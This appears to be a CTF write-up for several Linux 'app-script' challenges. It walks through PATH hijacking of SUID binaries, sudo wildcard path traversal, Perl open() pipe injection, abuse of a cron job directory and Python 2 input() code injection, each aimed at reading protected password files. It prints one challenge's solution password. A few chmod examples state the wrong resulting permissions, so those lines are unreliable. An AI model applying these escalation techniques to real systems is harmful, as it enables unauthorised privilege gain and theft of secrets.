Bash - System 1

What are SUID privileged programs

  • The concept of effective uid and real uid.
  • For non Set-UID programs, the effective uid and the real uid are the same.
  • For Set-UID programs, the effective uid is the owner of the program, while the real uid is the user of the program.

Normally, UNIX scripts and programs run with the same permissions as the user who executes them.

SUID programs, however, override normal permissions and always run with the permissions of the program’s owner.

The /usr/bin/passwd command is SUID and is owned by root. It always runs with the same permissions as root.

$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 63944 Jul 16  2019 /usr/bin/passwd

How to turn on the Set-UID bit

$ chmod 4777 file -> -rwsr-xr-x 

What does the ‘s’ & ‘t’ in file permissions mean

之前的两个例子中,如果仔细观察,不难发现s,它表示当前为SUID或者SGID特权程序;如果发现是大写S则说明s权限未生效;之前例子中出现的4就为s权限的数字表示,且位于特殊位

t在接下来的题中会出现,它一般针对权限是777的文件夹,如果文件设置了t权限则只有属主和root有删除文件的权限;linux存放临时文件夹的tmp目录就是t权限

开启权限
$chmod 1777 file -> drwxrwxrwt

关闭权限
$chmod 1777 file -> drwxrwxrwx

What are PATH Environment Variables

When running a command in a shell, the shell searches for the command using the PATH environment variable, which consists of a list of directories.

The shell program searches through this list of directories in the same order as they are specified in the PATH environment variable.

The first program that matches with the name of the command will be executed.

What would happen in the following? Note that system (const char *cmd) library function first invoke the /bin/sh program, and then let the shell program execute cmd.

system ("mail");

The attacker can change PATH to the following, and cause “mail” in the current directory to be executed.

export PATH=.:$PATH

.:$PATH表示在将当前文件夹加入到之前的PATH环境变量中,最后使用EXPORT进行设置

Start the game

查看当前路径

app-script-ch11@challenge02:~$ pwd
/challenge/app-script/ch11

查看当前目录

app-script-ch11@challenge02:~$ ll
total 28
dr-xr-x---  2 app-script-ch11-cracked app-script-ch11 4096 May 19  2019 ./
drwxr-xr-x 17 root                    root            4096 Mar 19 20:19 ../
-r--------  1 app-script-ch11-cracked app-script-ch11   14 Feb  8  2012 .passwd
-r--r-----  1 app-script-ch11-cracked app-script-ch11  494 May 19  2019 Makefile
-r-sr-x---  1 app-script-ch11-cracked app-script-ch11 7252 May 19  2019 ch11*
-r--r-----  1 app-script-ch11-cracked app-script-ch11  187 May 19  2019 ch11.c

ch11文件为SUID特权文件以及.passwd敏感文件

查看ch11文件

app-script-ch11@challenge02:~$ cat ch11.c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    setreuid(geteuid(), geteuid());
    system("ls /challenge/app-script/ch11/.passwd");
    return 0;
}

system("ls /challenge/app-script/ch11/.passwd");可以实现对ch11文件的操作,但应该为cat命令才能实现读取文件,若将cat命令名更改为ls即可实现绕过

查看PATH环境变量

app-script-ch11@challenge02:/usr/local/bin$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/opt/tools/checksec/

查找cat和ls命令

app-script-ch11@challenge02:~$ ll /bin | grep -w "ls"
-rwxr-xr-x  1 root root  145144 Jan 18  2018 ls*
app-script-ch11@challenge02:~$ ll /bin | grep -w "cat"
-rwxr-xr-x  1 root root   38420 Jan 18  2018 cat*

二者都存在与/bin目录下

将cat命令复制到/tmp

app-script-ch11@challenge02:/tmp$ cp /bin/cat .

/tmp此时权限如下,没有读权限;可以在/tmp内新建文件夹并在其中进行操作更为明了

drwxrwx-wt  42 root root 2166784 May 12 17:36 tmp/

将cat命令更名为ls

app-script-ch11@challenge02:/tmp$ mv cat ls

修改环境变量

app-script-ch11@challenge02:/tmp$ export PATH=.:$PATH

利用ch11读取.passwd

app-script-ch11@challenge02:/tmp$ ~/ch11

Reference

Dangers of SUID Shell Scripts

SUID Privileged Programs

sudo - weak configuration

What is sudo

  • Allows delegation of specific root privileges
  • Allows users to run specific commands as a different user

Run a Command as Another User

  • Use the -u flag
    $ sudo -u <username>
  • Enter your password, not the root password

Sudo Policy Format

The complex stuff is in /etc/sudoers

User Host=(RunAs) Command
  • User = who can do this
  • Host = which host this applies to
  • RunAs = target user (optional)
  • Command = the privileged command

Default Sudo Policy

%wheel ALL = ALL

If you’re in the wheel group, you get total access.

Testing sudoers

What access do I have

$ sudo -l

What access do other users have

$ sudo -U <username> -l

How to add a user into Sudo

usermod -a -G wheel/sudo <username>

如果/etc/sudoers中没有sudo组,可以将你的用户指向wheel用户组, wheel用户组同样有sudo权限

Start the game

查看readme

app-script-ch1@challenge02:~$ cat readme.md
Vous devez réussir à lire le fichier .passwd situé dans le chemin suivant :
/challenge/app-script/ch1/ch1cracked/

You have to read the .passwd located in the following PATH :
/challenge/app-script/ch1/ch1cracked/

当前用户app-script-ch1ch1cracked文件夹不具有读操作

查看当前目录

app-script-ch1@challenge02:~$ pwd
/challenge/app-script/ch1

查看当前用户访问权限

app-script-ch1@challenge02:~/ch1cracked$ sudo -l
[sudo] password for app-script-ch1:
Matching Defaults entries for app-script-ch1 on challenge02:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch1 may run the following commands on challenge02:
    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/notes/*

*匹配所有字符

利用用户app-script-ch1-cracked进行访问

app-script-ch1@challenge02:~/ch1cracked$ sudo -u app-script-ch1-cracked /bin/cat /challenge/app-script/ch1/notes/../ch1cracked/.passwd

Reference

sudo you are doing it wrong

Bash - System 2

Start the game

查看ch12文件

app-script-ch12@challenge02:~$ cat ch12.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
    setreuid(geteuid(), geteuid());
    system("ls -lA /challenge/app-script/ch12/.passwd");
    return 0;
}

创建/tmp/hacker

app-script-ch12@challenge02:~$ cd /tmp/
app-script-ch12@challenge02:/tmp$ mkdir hacker

生成ls.c & 编译成ls

#include <stdlib.h>
#include <stdio.h>

int main(){
        system("cat /challenge/app-script/ch12/.passwd");
        return 0;
}

system()中的参数要用双引号包裹

app-script-ch12@challenge02:/tmp/hacker$ gcc -o ls ls.c

修改环境变量 & 执行ch12文件

app-script-ch12@challenge02:/tmp/hacker$ export PATH=.:$PATH
app-script-ch12@challenge02:/tmp/hacker$ ~/ch12

Reference

(Null)

Perl - Command injection

The security issues about open()

The open() function in Perl is used to open files. In its most common form, it is used in the following way:

open (FILEHANDLE, "filename");

If the filename begins with “|”, the filename is interpreted as a command to which output is to be piped

open (FILEHANDLE, "| filename");

Start the game

app-script-ch7@challenge02:~$ ./setuid-wrapper
*************************
* Stat File Service    *
*************************
>>> | cat .passwd
PerlCanDoBetterThanYouThink
~~~ Statistics for "| cat .passwd" ~~~
Lines: 0
Words: 0
Chars: 0

Reference

Security Issues in Perl Scripts

Bash - cron

Linux有两种链接

  • 硬链接
  • 符号链接(软链接)

软链接文件类似于Windows的快捷方式

# cron.d为软链接文件,其指向/tmp/._cron/
cron.d -> /tmp/._cron/ 

How do ${0##*/} and ${0%/*} work?

  • ${0##*/}

    for the variable $0, and the pattern /, the two # mean from the beginning of the parameter, delete the longest match and including the pattern

  • ${0%/*}

    the pattern / is matched against the end of parameter %, with the shortest match deleted

$0 = $HOME/documents/doc.txt
${0##*/} -> doc.txt
${0%/*} -> $HOME/documents

What is the meaning of $0?

$0表示要执行的shell脚本名称

What is the meaning of -f -a -x in bash if statement

  • -f

    当file存在并且是正规文件时返回真

  • -a

    &&

  • -x

    当file可执行时返回真

Start the game

查看当前目录

app-script-ch4@challenge02:~$ ll
total 16
dr-xr-x---  2 app-script-ch4-cracked app-script-ch4         4096 Jul  1  2017 ./
drwxr-xr-x 17 root                   root                   4096 Mar 19 20:19 ../
-r-xr-x---  1 app-script-ch4-cracked app-script-ch4          767 Jul  2  2017 ch4*
lrwxrwxrwx  1 app-script-ch4         app-script-ch4           11 May 25  2015 cron.d -> /tmp/._cron/
-r--r-----  1 app-script-ch4-cracked app-script-ch4-cracked   16 Jun  1  2013 .passwd

查看ch4文件

#!/bin/bash

# Sortie de la commande 'crontab -l' exécutée en tant que app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# Vous N'avez PAS à modifier la crontab(chattr +i t'façons)

# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)

# hiding stdout/stderr
exec 1>/dev/null 2>&1

wdir="cron.d/"
challdir=${0%/*}
cd "$challdir"


if [ ! -e "/tmp/._cron" ]; then
    mkdir -m 733 "/tmp/._cron"
fi

ls -1a "${wdir}" | while read task; do
    if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
        timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"
    fi
    rm -f "${PWD}/${wdir}${task}"
done

rm -rf cron.d/*

审计ch4文件

Linux定时任务每隔一分钟执行一次ch4文件,ch4文件会执行cron.d/下的可执行文件之后便删除cron.d/

编写解题脚本

app-script-ch4@challenge02:~$ vim cron.d/1.sh
#!/bin/bash
if [ ! -e "/tmp/ch4" ]; then
    mkdir -m 777 "/tmp/ch4"
fi
/bin/cat /challenge/app-script/ch4/.passwd > /tmp/ch4/result.txt

设置脚本权限

app-script-ch4@challenge02:~$ crontab -l
You (app-script-ch4) are not allowed to use this program (crontab)
See crontab(1) for more information

Output of the command ‘crontab -l’ run as app-script-ch4-cracked

由以上输出再结合题目提示得知,执行定时任务的用户为app-script-ch4-cracked

app-script-ch4@challenge02:~$ chmod 777 cron.d/1.sh

查看.passwd文件

app-script-ch4@challenge02:~$ cat /tmp/ch4/result.txt

Reference

(Null)

Python - input()

Start the game

查看ch6文件

app-script-ch6@challenge02:~$ cat ch6.py
#!/usr/bin/python2

import sys

def youLose():
    print "Try again ;-)"
    sys.exit(1)


try:
    p = input("Please enter password : ")
except:
    youLose()


with open(".passwd") as f:
    passwd = f.readline().strip()
    try:
        if (p == int(passwd)):
            print "Well done ! You can validate with this password !"
    except:
        youLose()

利用input()命令执行漏洞

app-script-ch6@challenge02:~$ ./setuid-wrapper
Please enter password : __import__('os').system('cat .passwd')

Reference

Python中input()函数漏洞及与raw_input()函数区别